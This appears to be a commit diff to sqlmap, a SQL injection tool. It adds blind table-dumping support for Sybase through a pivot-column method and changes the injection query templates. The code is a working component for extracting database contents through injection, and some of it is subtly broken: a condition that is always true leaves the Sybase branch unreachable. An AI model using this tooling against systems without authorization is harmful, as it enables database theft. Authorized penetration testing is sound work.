update regarding Sybase dumping

2024-11-22 09:36:35 +03:00 · 2011-02-19 00:36:47 +00:00 · 2011-02-19 00:36:47 +00:00 · 5f4ffc9287
commit 5f4ffc9287
parent df58bcaf95
2 changed files with 95 additions and 8 deletions
--- a/plugins/generic/enumeration.py
+++ b/plugins/generic/enumeration.py
@ -1039,7 +1039,7 @@ class Enumeration:
            elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
                query = rootQuery.blind.count % conf.tbl.upper()
                query += condQuery
-            elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
+            elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
                query = rootQuery.blind.count % (conf.db, conf.db, conf.tbl)
                query += condQuery.replace("[DB]", conf.db)
            elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
@ -1075,7 +1075,7 @@ class Enumeration:
                    query = rootQuery.blind.query % (conf.tbl.upper())
                    query += condQuery
                    field = None
-                elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
+                elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
                    query = rootQuery.blind.query % (conf.db, conf.db,
                                                           conf.db, conf.db,
                                                           conf.db, conf.db,
@ -1123,6 +1123,86 @@ class Enumeration:

        return kb.data.cachedColumns

+    def __pivotDumpTable(dumpNode, table, colList, indexRange, blind=True):
+        lengths = {}
+        entries = {}
+
+        validColumnList = False
+        validPivotValue = False
+
+        count = len(indexRange)
+
+        for column in colList:
+            infoMsg = "fetching number of distinct "
+            infoMsg += "values for column '%s'" % column
+            logger.info(infoMsg)
+
+            query = dumpNode.count2 % (column, table)
+            if blind:
+                value = inject.getValue(query, inband=False, error=False)
+            else:
+                value = inject.getValue(query, blind=False)
+
+            if isNumPosStrValue(value):
+                validColumnList = True
+                if value == count:
+                    infoMsg = "using column '%s' as a pivot " % column
+                    infoMsg += "for retrieving row data"
+                    logger.info(infoMsg)
+
+                    validPivotValue = True
+
+                    colList.remove(column)
+                    colList.insert(0, column)
+                    break
+
+        if not validColumnList:
+            errMsg = "all column name(s) provided are non-existent"
+            raise sqlmapNoneDataException, errMsg
+
+        if not validPivotValue:
+            warnMsg = "no proper pivot column provided (with unique values)." 
+            warnMsg += " all rows can't be retrieved."
+            logger.warn(warnMsg)
+
+        pivotValue = " "
+        breakRetrieval = False
+
+        for index in indexRange:
+            if breakRetrieval:
+                break
+
+            for column in colList:
+                if column not in lengths:
+                    lengths[column] = 0
+
+                if column not in entries:
+                    entries[column] = []
+
+                if column == colList[0]:
+                    # Correction for pivotValues with unrecognized chars
+                    if pivotValue and '?' in pivotValue and pivotValue[0]!='?':
+                        pivotValue = pivotValue.split('?')[0]
+                        pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
+                    query = dumpNode.query % (column, table, column, pivotValue)
+                else:
+                    query = dumpNode.query2 % (column, table, colList[0], pivotValue)
+
+                if blind:
+                    value = inject.getValue(query, inband=False, error=False)
+                else:
+                    value = inject.getValue(query, blind=False)
+
+                if column == colList[0]:
+                    if not value:
+                        breakRetrieval = True
+                        break
+                    else:
+                        pivotValue = value
+
+                lengths[column] = max(lengths[column], len(value) if value else 0)
+                entries[column].append(value)
+
    def dumpTable(self):
        if not conf.tbl and not conf.col:
            errMsg = "missing table parameter"
@ -1265,6 +1345,8 @@ class Enumeration:
                query = rootQuery.blind.count % (conf.tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), conf.tbl.upper())))
            elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
                query = rootQuery.blind.count % conf.tbl
+            elif Backend.getIdentifiedDbms() == DBMS.SYBASE:
+                query = rootQuery.blind.count % ("%s..%s" % (conf.db, conf.tbl))
            else:
                query = rootQuery.blind.count % (conf.db, conf.tbl)
            count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
@ -1290,16 +1372,21 @@ class Enumeration:
            indexRange = getRange(count, dump=True, plusOne=plusOne)

            try:
-                if Backend.getIdentifiedDbms() == DBMS.ACCESS:
+                if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE):
                    validColumnList = False
                    validPivotValue = False

+                    if DBMS.ACCESS:
+                        table = conf.tbl
+                    elif DBMS.SYBASE:
+                        table = "%s..%s" % (conf.db, conf.tbl)
+
                    for column in colList:
                        infoMsg = "fetching number of distinct "
                        infoMsg += "values for column '%s'" % column
                        logger.info(infoMsg)

-                        query = rootQuery.blind.count2 % (column, conf.tbl)
+                        query = rootQuery.blind.count2 % (column, table)
                        value = inject.getValue(query, inband=False, error=False)

                        if isNumPosStrValue(value):
@ -1343,9 +1430,9 @@ class Enumeration:
                                if pivotValue and '?' in pivotValue and pivotValue[0]!='?':
                                    pivotValue = pivotValue.split('?')[0]
                                    pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
-                                query = rootQuery.blind.query % (column, conf.tbl, column, pivotValue)
+                                query = rootQuery.blind.query % (column, table, column, pivotValue)
                            else:
-                                query = rootQuery.blind.query2 % (column, conf.tbl, colList[0], pivotValue)
+                                query = rootQuery.blind.query2 % (column, table, colList[0], pivotValue)

                            value = inject.getValue(query, inband=False, error=False)

--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -468,7 +468,7 @@

    <!-- Sybase -->
    <dbms value="Sybase">
-        <cast query="CAST(%s AS VARCHAR(8000))"/>
+        <cast query="CONVERT(NVARCHAR(4000),%s)"/>
        <length query="LTRIM(STR(LEN(%s)))"/>
        <isnull query="ISNULL(%s, ' ')"/>
        <delimiter query="+"/>
@ -512,7 +512,7 @@
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s..%s"/>
-            <blind query="SELECT TOP 1 %s FROM (SELECT TOP 1 * FROM ( SELECT TOP %d * FROM %s..%s ORDER BY %s ASC ) AS t1 ORDER BY %s DESC) AS t2 ORDER BY %s ASC" count="SELECT LTRIM(STR(COUNT(*))) FROM %s..%s"/>
+            <blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
        </dump_table>
        <search_db>
            <inband query="SELECT name FROM master..sysdatabases WHERE " condition="name"/>